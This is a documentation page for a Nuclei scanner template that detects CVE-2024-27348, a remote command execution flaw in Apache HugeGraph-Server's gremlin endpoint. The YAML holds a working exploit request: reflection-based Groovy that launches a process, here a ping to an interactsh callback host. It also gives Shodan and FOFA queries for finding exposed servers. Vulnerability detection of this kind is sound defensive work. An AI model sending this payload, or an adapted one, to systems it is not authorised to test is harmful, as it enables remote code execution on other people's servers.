Skip to content
Nuclei Templates

Apache HugeGraph-Server - Remote Command Execution

ID: CVE-2024-27348

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,hugegraph,rce,apache,kev

Description

Section titled “Description”

Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.

YAML Source

Section titled “YAML Source”
id: CVE-2024-27348


info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache,kev


http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4b0a00483046022100a6b77073dcabe9fc9a67c28d1e4dd9ee5183bf70b711edb0d8c8b60e8155685e022100e1bcd5934193a0df71a297669e2e4af8161d95c7ea66bd7bf0c32e9a3fdc2639:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27348.yaml"

View on Github